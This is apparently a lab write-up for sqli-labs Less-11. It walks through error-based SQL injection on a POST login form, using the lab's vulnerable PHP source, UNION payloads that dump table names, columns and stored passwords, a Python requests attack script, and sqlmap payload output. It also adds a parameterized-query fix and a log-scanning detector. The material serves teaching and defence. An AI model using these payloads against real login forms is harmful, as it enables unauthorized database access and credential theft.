sqli-lab-less11

1. Target address

Less-11 POST-Error Based-Single quotes-String
# String-type, error-based SQL injection
http://127.0.0.1/sqli/less-11/

2. Vulnerability probing

http://127.0.0.1/sqli/less-11/

Capture the request with Burp Suite, or use F12 -> Network -> Request to find the POST packet.

Enter admin / admin; the POST body obtained is:
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin

The business logic is presumably: look up the row by the submitted username and password, then compare.
uname=1'&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1

The fragment reported in the error is '1'' and password='' LIMIT 0,1
The inferred statement is therefore: select username,password from users where username='$uname' and password='$passwd' limit 0,1;

3. Source code analysis

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Less-11- Error Based- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">
 
# Form submission
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
	    <input type="text"  name="uname" value=""/>
	</div>  
	<div> Password  : &nbsp;&nbsp;&nbsp;
		<input type="text" name="passwd" value=""/>
	</div></br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit" />
	</div>
</form>

</div></div>

<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
# isset() checks whether a variable is set and is not NULL.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname);
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row) # a row was returned: its data is echoed back
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else # no row returned: nothing is echoed; on a syntax error the SQL error message is echoed
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}
}

?>


</font>
</div>
</body>
</html>
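To make the defect in the $sql line above concrete, here is an added example (not the lab's code) that rebuilds that query in Python on a constructed in-memory SQLite table, next to the parameterized form that removes the injection. SQLite stands in for MySQL here; the quoting rules that matter (single-quoted string literals, '' as an escaped quote) are the same, so the uname=1' probe from section two produces the same kind of syntax error. The table contents and the function names are assumptions for the example.

```python
import sqlite3

# Added example (not the lab's code): the lab's $sql line rebuilt in Python on
# a constructed in-memory SQLite table, next to the parameterized form that
# removes the injection. SQLite stands in for MySQL; the quoting rules that
# matter here (string literals in single quotes, '' as an escaped quote) match.

def make_db():
    """Constructed stand-in for the lab's users table; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "admin"), ("Dumb", "Dumb")])
    conn.commit()
    return conn

def lookup_unsafe(conn, uname, passwd):
    """Mirrors the lab: user input is concatenated straight into the statement."""
    sql = ("SELECT username, password FROM users "
           "WHERE username='%s' and password='%s' LIMIT 0,1" % (uname, passwd))
    return conn.execute(sql).fetchone()

def lookup_safe(conn, uname, passwd):
    """Same query with bound parameters: the input is data, never SQL text."""
    sql = ("SELECT username, password FROM users "
           "WHERE username=? AND password=? LIMIT 0,1")
    return conn.execute(sql, (uname, passwd)).fetchone()

def login_outcome(lookup, conn, uname, passwd):
    """Classify what the page would show: a row, no row, or a database error."""
    try:
        row = lookup(conn, uname, passwd)
    except sqlite3.OperationalError as exc:
        # The lab prints mysql_error() at this point, which is what leaks the
        # shape of the query to the user.
        return ("error", str(exc))
    return ("row", row) if row else ("no_row", None)

if __name__ == "__main__":
    db = make_db()
    probe = "1'"                                    # the probe from section two
    union = "1' union select user(),database() #"   # the payload from section four
    for name, fn in (("unsafe", lookup_unsafe), ("safe", lookup_safe)):
        print(name, "admin/admin ->", login_outcome(fn, db, "admin", "admin"))
        print(name, "1'/2       ->", login_outcome(fn, db, probe, "2"))
    # With bound parameters the UNION payload is just an unknown username.
    print("safe  union payload ->", login_outcome(lookup_safe, db, union, "1"))
```

The PHP equivalent of lookup_safe is a mysqli or PDO prepared statement with bound parameters; the second fix the code needs is to stop printing mysql_error() to the response, since that message is exactly what section two used to recover the query.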

4. Black-box and white-box testing

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

# Query the current user and database
uname=1' union select user(),database() #&passwd=1&submit=Submit
# Errors out: --+ cannot be used here, while # works. When the payload is typed into the form field the browser sends + as %2B, so MySQL receives --+ with no trailing space, which is not a valid comment.
uname=1' union select user(),database() --+&passwd=1&submit=Submit
# uname=1 matches no row, so the two values selected by the UNION are the ones echoed back
select username,password from users where username='1' union select user(),database() #' and password='1' limit 0,1;

# Query table names
uname=1' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit

# Query column names
uname=1' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit

# Query column values
uname=1' union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1' union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit

5. Writing the script

import requests

url = "http://192.168.128.159/sqli/less-11/index.php"
# Headers copied from the browser (F12) or from a Burp Suite capture
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# POST body; the PHP only checks that uname and passwd are set, so submit is not needed
payload = {
    "uname": "1' union select user(),database() #",
    "passwd": "admin"
}
response = requests.post(url, headers=header, data=payload)
print(response.text)

6. sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-11/" --data "uname=1&passwd=1&submit=Submit" --batch

Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1' OR NOT 5787=5787#&passwd=11&submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1' AND (SELECT 9458 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(9458=9458,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QGhc&passwd=11&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1' AND (SELECT 1698 FROM (SELECT(SLEEP(5)))Gmgb)-- VBGO&passwd=11&submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x795a5a53624c51795a4771767578594b474b72694e59424143654570547a7a4e6774636563467142,0x716a706b71)#&passwd=11&submit=Submit
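The lab writes every submitted uname and passwd to result.txt (see the fopen block in section three), which makes that file a natural place to look for the requests shown in sections four and six. The following added example (not the lab's code, and not part of sqlmap) scans lines in that file's format and flags the indicators that those payloads carry. The indicator patterns are derived only from payloads on this page; the sample log lines are constructed from them, and the function names are assumptions for the example.

```python
import re

# Added example (not the lab's code): a small scanner for the lab's own
# result.txt, whose lines have the form
#     User Name:<uname>Password:<passwd>
# The indicator patterns below are derived only from payloads shown on this page.

INDICATORS = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "boolean_tautology": re.compile(r"\b(or|and)\s+(not\s+)?\d+\s*=\s*\d+", re.I),
    "sleep_call": re.compile(r"\bsleep\s*\(", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
    "comment_marker": re.compile(r"(#\s*$|--\s)"),
}

def parse_line(line):
    """Split one result.txt line into (uname, passwd); None if malformed.

    The lab's format has no delimiter that cannot also appear in the input,
    so the split is on the last 'Password:'; an attacker-controlled value that
    contains that string is therefore logged ambiguously. That is a defect of
    the log format (log fields separately, or as JSON), not of this parser.
    """
    if not line.startswith("User Name:"):
        return None
    rest = line[len("User Name:"):]
    uname, sep, passwd = rest.rpartition("Password:")
    if not sep:
        return None
    return uname, passwd

def scan_field(value):
    """Return the names of every indicator that fires on one form field."""
    hits = [name for name, pat in INDICATORS.items() if pat.search(value)]
    # An odd number of single quotes is the classic first probe (uname=1').
    if value.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    return hits

def severity(hits):
    if len(hits) >= 2:
        return "high"
    return "low" if hits else "none"

def scan_log(lines):
    """Scan parsed lines; each result carries the fields, indicators, severity."""
    results = []
    for line in lines:
        parsed = parse_line(line.rstrip("\n"))
        if parsed is None:
            continue
        uname, passwd = parsed
        hits = sorted(set(scan_field(uname) + scan_field(passwd)))
        results.append({"uname": uname, "passwd": passwd,
                        "indicators": hits, "severity": severity(hits)})
    return results

# Constructed sample log: the page's own requests (sections two, four and six,
# with the error-based sqlmap payload shortened) in the lab's result.txt format.
SAMPLE_LOG = """\
User Name:adminPassword:admin
User Name:1'Password:2
User Name:1' union select user(),database() #Password:1
User Name:1' OR NOT 5787=5787#Password:11
User Name:1' AND (SELECT 9458 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QGhcPassword:11
User Name:1' AND (SELECT 1698 FROM (SELECT(SLEEP(5)))Gmgb)-- VBGOPassword:11
User Name:1' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x795a,0x716a706b71)#Password:11
"""

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{r['severity']:<5} {r['indicators']!s:<60} uname={r['uname']!r}")
```

The single-quote probe scores low on its own, which is deliberate: one stray quote is common in legitimate input, while a quote combined with a UNION, a comment marker or a SLEEP call is the pattern the manual and sqlmap payloads above all share. Note also that the lab is storing plaintext passwords in this file, so on a real system the file itself would be a finding.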

7. Summary

1. Data is submitted through a form
2. A new sqlmap usage